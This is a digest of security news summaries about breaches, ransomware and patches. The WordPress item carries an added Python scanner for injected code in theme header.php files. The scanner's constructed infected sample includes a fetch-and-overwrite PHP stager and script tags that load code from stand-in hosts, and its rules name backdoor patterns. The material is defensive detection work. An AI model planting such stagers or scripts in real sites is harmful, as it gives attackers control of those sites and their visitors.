Voter info for millions of Indonesians shared on hacker forum

Bleeping Computer

A threat actor has shared the 2014 voter information for close to 2 million Indonesians on a well-known hacker forum and claims they will release a total of 200 million at a later date.

In the forum post, the threat actor states that the voter records are stored in individual PDF files that they took from the KPU, the general election commission of Indonesia.

Full article

Our conclusion

What is stored on network-connected computers not only can, but eventually will, be leaked.

EasyJet hacked: data breach affects 9 million customers

Bleeping Computer


EasyJet, the UK’s largest airline, has disclosed that it was hacked and that the email addresses and travel information of 9 million customers were exposed. For some of these customers, credit card details were also accessed by the attackers.

In a data breach notification disclosed today, EasyJet states that they have suffered a cyberattack, and an unauthorized third-party was able to gain access to their systems.

During this attack, the threat actors were able to access the email addresses and travel information of 9 million customers. For approximately 2,208 customers, credit card details were also exposed.

Full article

Massive campaign targets 900,000 WordPress sites in a week

Bleeping Computer

Hackers have launched a massive attack against more than 900,000 WordPress sites, seeking to redirect visitors to malvertising sites or to plant a backdoor if an administrator is logged in.

Based on the payload, the attacks seem to be the work of a single threat actor, who used at least 24,000 IP addresses over the past month to send malicious requests to more than 900,000 sites.

XSS, malvertising, backdoor

Compromise attempts increased after April 28. WordPress security company Defiant, makers of the Wordfence security plugin, detected on May 3 over 20 million attacks against more than half a million websites.

Ram Gall, senior QA at Defiant, said that the attackers focused mostly on exploiting cross-site scripting (XSS) vulnerabilities in plugins that received a fix months or years ago and had been targeted in other attacks.

Redirecting visitors to malvertising is one effect of a successful compromise. If the injected JavaScript runs in the browser of a logged-in administrator, it tries to inject a PHP backdoor into the theme’s header file, along with another piece of JavaScript.

The backdoor then fetches a further payload and stores it in the theme’s header in an attempt to execute it. “This method would allow the attacker to maintain control of the site,” Gall explains.

This way, the attacker could switch to a different payload: a webshell, code that creates a malicious admin user, or code that deletes the site’s entire content. In today’s report, Defiant included indicators of compromise for the final payload.
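The chain described above (a stored XSS in an outdated plugin, the script running in a logged-in administrator's browser, a PHP backdoor written into the theme's header.php, which then fetches a further payload) leaves a recognisable footprint in header.php. The scanner below is an added example written for this digest; it is not Defiant's or Wordfence's code and it does not reproduce the indicators of compromise from their report. Its rules are generic markers of injected code (decoder-wrapped eval, request-driven file writes, hex-obfuscated or foreign script tags), and the two sample header.php bodies, the host names (example.org, cdn.example, ads.example) and the base64 blob are constructed for illustration.

```python
"""Heuristic scanner for PHP/JS injected into WordPress theme header.php files.

Added example: the rules are generic indicators of injected code, not the
indicators of compromise from any vendor report. Sample inputs are constructed.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable

# Patterns that have no business in a theme's header.php.
RULES = [
    # eval()/assert() fed by a decoder is the classic one-line PHP backdoor.
    ("php_eval_decoder",
     re.compile(r"\b(eval|assert|create_function)\s*\(\s*"
                r"(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    # Request-controlled input feeding a file write/fetch on the same line:
    # the "fetch another payload and store it in the header" stager behaviour.
    ("php_remote_fetch_stager",
     re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b[^\n]*?"
                r"(file_put_contents|file_get_contents|curl_exec|fwrite|fopen)\s*\(", re.I)),
    # Inline script built from runs of \xNN escapes (obfuscated redirector).
    ("js_hex_obfuscation",
     re.compile(r"<script[^>]*>[^<]*?(\\x[0-9a-f]{2}){4,}", re.I)),
    # document.write(unescape(...)) assembling a tag at runtime.
    ("js_document_write_unescape",
     re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
]

# External <script src="//host/..."> is flagged unless the host is allow-listed.
EXTERNAL_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"'](?:https?:)?//(?P<host>[^/\"'\s]+)", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    line: int      # 1-based line number in the scanned file
    snippet: str   # the offending line (truncated) or the external host


def _line_of(source: str, pos: int) -> int:
    return source.count("\n", 0, pos) + 1


def _excerpt(source: str, pos: int, width: int = 80) -> str:
    start = source.rfind("\n", 0, pos) + 1
    end = source.find("\n", pos)
    end = len(source) if end == -1 else end
    return source[start:end][:width]


def scan_header(source: str, allowed_hosts: Iterable[str] = ()) -> list:
    """Return Findings for one header.php body, sorted by line then rule."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for rule, pattern in RULES:
        for m in pattern.finditer(source):
            findings.append(Finding(rule, _line_of(source, m.start()),
                                    _excerpt(source, m.start())))
    for m in EXTERNAL_SRC.finditer(source):
        host = m.group("host").lower()
        if host not in allowed:
            findings.append(Finding("js_external_src", _line_of(source, m.start()), host))
    return sorted(findings, key=lambda f: (f.line, f.rule))


def scan_theme_dir(root, allowed_hosts: Iterable[str] = ()) -> dict:
    """Scan every header.php under a themes tree; returns {path: findings}."""
    results = {}
    for path in Path(root).rglob("header.php"):
        found = scan_header(path.read_text(errors="replace"), allowed_hosts)
        if found:
            results[str(path)] = found
    return results


# Constructed sample: an untouched header.php as shipped by a typical theme.
CLEAN_HEADER = r"""<?php
/**
 * The header for our theme (constructed clean sample)
 */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
"""

# Constructed sample: the same file after the injection chain described above.
INFECTED_HEADER = r"""<?php eval(base64_decode('ZWNobyAiaGVsbG8iOw==')); ?>
<?php
/**
 * The header for our theme (constructed infected sample)
 */
?><!DOCTYPE html>
<html>
<head>
<script>var _0x1f=['\x68\x74\x74\x70\x73\x3a'];document.write(unescape('%3Cscript%20src%3D%22%2F%2Fads.example%2Fr.js%22%3E%3C%2Fscript%3E'));</script>
<script src="//cdn.example/track.js"></script>
<?php if (isset($_REQUEST['q'])) { @file_put_contents(__DIR__.'/header.php', @file_get_contents($_REQUEST['q'])); } ?>
</head>
<body>
"""

if __name__ == "__main__":
    for f in scan_header(INFECTED_HEADER, allowed_hosts={"example.org"}):
        print(f"line {f.line:>3}  {f.rule:<28} {f.snippet}")
```

Run it against wp-content/themes on a suspect host with the site's own domain in the allow list; any hit on `php_eval_decoder` or `php_remote_fetch_stager` in a theme header is worth treating as a compromise rather than a false positive, while `js_external_src` needs the allow list tuned to the CDNs the site legitimately loads.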

Full article

Office 365 to stop data theft by disabling external forwarding

Bleeping Computer

Microsoft is planning to put a stop to enterprise data theft via email forwarding by disabling Office 365’s email forwarding to external recipients by default.

The company also wants to add improved external email forwarding controls, which will allow Office 365 admins to enable the feature only for select employees in their organizations.

Full article

Twitter kills SMS-based tweeting in most countries

Bleeping Computer

Twitter announced today that it has turned off its Twitter via SMS service because of security concerns. The service had allowed the social network’s users to tweet by text message since its early days.

“We want to continue to help keep your account safe,” the company’s support account tweeted earlier today. 

“We’ve seen vulnerabilities with SMS, so we’ve turned off our Twitter via SMS service, except for a few countries.”

However, as the company added, Twitter users will still be able to use “important SMS messages” to log in to the platform and to manage their accounts.

Full article

Microsoft investigating Windows 10 KB4549951 BSOD reports

Bleeping Computer

Microsoft is investigating Bluetooth issues, failures to install, and blue screen reports received from users who have installed or attempted to install the KB4549951 cumulative update released during this month’s Patch Tuesday.

KB4549951 provides customers with security fixes for devices running Windows 10, version 1909, and Windows 10, version 1903, and it can be installed automatically by checking for updates via Windows Update or manually from the Microsoft Update Catalog.

Windows admins can also distribute the update to users via Windows Server Update Services (WSUS). Customers who have automatic updates enabled don’t need to take any further actions.

As we reported last week, users are reporting a wide assortment of issues when installing and after deploying KB4549951, ranging from blue screens of death (BSODs), failures to install, networking issues and display issues to system freezes when trying to use streaming services.

Others are saying that their Windows 10 installation is completely broken with their devices being unable to boot again after installing the KB4549951 update.

Full article

The Week in Ransomware – April 24th 2020 – High Profile Attacks

Bleeping Computer

There were not many new variants released this week, but we did see some attacks on high-profile victims.

This past weekend it came to light that IT service giant Cognizant suffered a Maze Ransomware attack. Strangely, while Cognizant is stating it was Maze, the ransomware operators are denying it.

DoppelPaymer also started to leak data from the City of Torrance in California, which was attacked on March 1st.

Other than that, we have seen a few new variants released this week and the unfortunate continued targeting of hospitals by ransomware operators.

Full article

Microsoft releases OOB security updates for Microsoft Office

Bleeping Computer

Microsoft has released an out-of-band security update that fixes remote code execution vulnerabilities in an Autodesk FBX library integrated into Microsoft Office and Paint 3D applications.

Last month, Autodesk issued security updates for their Autodesk FBX Software Development Kit that resolves remote code execution and denial of service vulnerabilities caused by specially crafted FBX files.

An FBX file is an Autodesk file format that is used to store 3D models, assets, shapes, and animations.

To exploit these vulnerabilities, an attacker would create a malicious FBX file that would exploit “buffer overflow, type confusion, use-after-free, integer overflow, NULL pointer dereference, and heap overflow vulnerabilities” to perform a DoS attack or remotely execute code.

Microsoft Office uses the Autodesk FBX library

As the Microsoft Office 2016, Microsoft Office 2019, Office 365, and Paint 3D applications utilize the Autodesk FBX library, Microsoft has today released new security updates that resolve these remote code execution and DoS vulnerabilities in its products.

In an advisory titled “ADV200004 | Availability of updates for Microsoft software utilizing the Autodesk FBX library”, Microsoft explains that opening malicious FBX files in Office applications could lead to remote code execution.

Full article

267 million Facebook profiles sold for $600 on the dark web

Bleeping Computer

Threat actors are selling over 267 million Facebook profiles for £500 ($623) on dark web sites and hacker forums. While none of these records include passwords, they do contain information that could allow attackers to perform spear phishing or SMS attacks to steal credentials.

Last month, security researcher Bob Diachenko discovered an open Elasticsearch database that contained a little over 267 million Facebook records, with most being users from the United States.

For many of these records, they contained a user’s full name, their phone number, and a unique Facebook ID.

The ISP hosting the database eventually took the server offline after being contacted by Diachenko.

Soon after, a second server containing the same data plus an additional 42 million records was brought online, but it was quickly attacked by unknown threat actors who left a message telling the owners to secure their servers.

Of this new data, 16.8 million records included more information such as a Facebook user’s email address, birth date, and gender.

It was not discovered who these servers belonged to, but Diachenko believed they were owned by a criminal organization that stole the data through the Facebook API before it was locked down, or by scraping public profiles.

Full article